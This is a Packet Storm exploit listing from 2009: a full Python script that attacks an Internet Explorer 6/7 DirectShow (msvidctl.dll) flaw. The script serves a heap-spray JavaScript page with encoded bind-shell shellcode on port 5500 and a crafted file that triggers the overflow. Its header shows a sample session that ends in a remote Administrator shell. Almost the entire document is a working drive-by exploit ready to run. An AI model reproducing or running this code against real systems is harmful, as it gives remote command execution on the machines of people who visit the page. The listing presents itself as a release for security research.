Internet Explorer 7 Overflow

2009-07-10T00:00:00
ID PACKETSTORM:79081
Type packetstorm
Reporter David Kennedy
Modified 2009-07-10T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
######################################################################################  
# MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890) #   
######################################################################################  
# #  
# Written by SecureState R&D Team #  
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin #  
# http://www.securestate.com #  
# #  
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #  
# #  
######################################################################################  
# Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7 #   
######################################################################################  
# #  
# This exploit is publicly being exploited in the wild, opted to release this #  
# to the research community. Microsoft is aware of the vulnerability. #  
# #  
######################################################################################  
# #  
# [-] Exploit sent... [-] #  
# [-] Wait about 30 seconds and attempt to connect.[-] #  
# [-] Connect to IP Address: 10.211.55.140 and port 5500 [-] #  
# #  
# relik@sslinuxvm1:~$ telnet 10.211.55.140 5500 #  
# Trying 10.211.55.140... #  
# Connected to 10.211.55.140. #  
# Escape character is '^]'. #  
# Microsoft Windows [Version 5.2.3790] #  
# (C) Copyright 1985-2003 Microsoft Corp. #  
# #  
# C:\Documents and Settings\Administrator\Desktop> #  
# #  
# #  
# NOTE: The javascript code is not obfuscated in anyway, normal A/V should pick this #  
# up. This is intentional. #  
# #  
# Improved reliability, appears to be about 95 percent of the time. Adjusted the #  
# spray size a bit. #  
# #  
######################################################################################  
from BaseHTTPServer import HTTPServer  
from BaseHTTPServer import BaseHTTPRequestHandler  
import sys,binascii  
try:  
import psyco  
psyco.full()  
except ImportError:  
pass  
class myRequestHandler(BaseHTTPRequestHandler):  
try:  
def do_GET(self):  
# Always Accept GET  
self.printCustomHTTPResponse(200)  
# trigger the overflow *boom*  
if self.path == "/ohn0es.jpg":  
unhex=binascii.unhexlify("000300001120340000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0c0c0c0c00")  
self.wfile.write(unhex)  
if self.path == "/":  
target=self.client_address[0]  
self.wfile.write("""<html><head>""")  
self.wfile.write("""  
<script language="JavaScript" defer>  
function Check() {  
// win32_bind - EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai http://metasploit.com */  
var shellcode = unescape("%ud9db%u74d9%uf424%uc929%u51b1%u02bf%u6c21%u588e%u7831%u8317%u04c0%u7a03%u8e32%u867b%ua55e%u9ec9%uc666%ua12d%ub2f9%u79be%u4fde%ubd7b%u2c95%uc581%u23a8%u7a02%u30b3%ua44a%uadc2%u2f3c%ubaf0%uc1be%u7cc8%ub159%ubdaf%uce2e%uf76e%ud1c2%ue3b2%uea29%ud066%u79f9%u9362%ua5a5%u4f6d%u2e3f%uc461%u6f4b%udb66%u8ca0%u50ba%ufebf%u7ae6%u3da1%u59d7%u4a45%u6e5b%u0c0d%u0550%u9061%u92c5%ua0c2%ucd4b%ufe4c%ue17d%u0101%u9f57%u9bf2%u5330%u0bc7%ue0b6%u9415%uf86c%u428a%ueb46%ua9d7%u0b08%u92f1%u1621%uad98%ud1df%uf867%ue075%ud298%u3de2%u276f%uea5f%u118f%u46f3%uce23%u2ba7%ub390%u5314%u55c6%ubef3%uff9b%u4850%u6a82%uee3e%ue45f%ub978%ud2a0%u56ed%u8f0e%u860e%u8bd8%u095c%u84f0%u8061%u7f51%ufd61%u9a3e%u78d4%u33f7%u5218%uef58%u0eb2%udfa6%ud9a8%ua6bf%u6008%ua717%uc643%u8768%u830a%u41f2%u30bb%u0496%uddde%u4f38%uee08%u8830%uaa20%ub4cb%uf284%u923f%ub019%u1c92%u19a7%u6d7e%u5a52%uc62b%uf208%ue659%u15fc%u6361%ue547%ud04b%u4b10%ub725%u01cf%u66c4%u80a1%u7797%u4391%u5eb5%u5a17%u9f96%u08ce%ua0e6%u33d8%ud5c8%u3070%u2d6a%u371a%uffbb%u171c%u0f2c%u9c68%ubcf2%u4b92%u92f3");  
var bigblock = unescape("%u9090%u9090");  
var headersize = 20;  
var slackspace = headersize + shellcode.length;  
while (bigblock.length < slackspace) bigblock += bigblock;  
var fillblock = bigblock.substring(0,slackspace);  
var block = bigblock.substring(0,bigblock.length - slackspace);  
// Original spray size below, use if you want exploit to load faster with higher crash rate.  
// while (block.length + slackspace < 0x40000) block = block + block + fillblock;  
while (block.length + slackspace < 0x70000) block = block + block + fillblock;  
var memory = new Array();  
for (i = 0; i < 350; i++){ memory[i] = block + shellcode}  
var myObject=document.createElement('object');  
DivID.appendChild(myObject);  
myObject.width='1';  
myObject.height='1';  
myObject.data='./ohn0es.jpg';  
// Vulnerable ID  
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';   
}   
</script>  
</head>  
<body onload="Check();">  
<div id="DivID">""")  
self.wfile.write("""<title>MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890)</title></head><body>""")  
self.wfile.write("""<left><body bgcolor="Black"><font color="White">  
###############################################################################  
<br>MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890)   
<br>Written by SecureState R&D Team   
<br>Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin   
<br>http://www.securestate.com   
<br>win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind   
<br>Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7   
<br>###############################################################################<br>   
<br>""")  
print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 5500 [-]" % (target))  
# Print custom HTTP Response  
def printCustomHTTPResponse(self, respcode):  
self.send_response(respcode)  
self.send_header("Content-type", "text/html")  
self.send_header("Server", "myRequestHandler")  
self.end_headers()  
  
# In case of exceptions, pass them  
except Exception:  
pass  
  
httpd = HTTPServer(('', 80), myRequestHandler)  
print ("""  
#####################################################################################  
# MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890) #  
#####################################################################################  
# #  
# Written by SecureState R&D Team #  
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin #  
# http://www.securestate.com #  
# #  
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #  
# #  
#####################################################################################  
# Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7 #  
#####################################################################################  
""")  
print ("[-] Starting MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray [-]")  
print ("[-] Have someone connect to you on port 80 [-]")  
print ("\n\nType <control>-c to exit..")  
try:  
# handle the connections  
httpd.handle_request()  
# Serve HTTP server forever  
httpd.serve_forever()   
# Except Keyboard Interrupts and throw custom message  
except KeyboardInterrupt:  
print ("\n\nExiting exploit...\n\n")  
sys.exit(1)  
  
`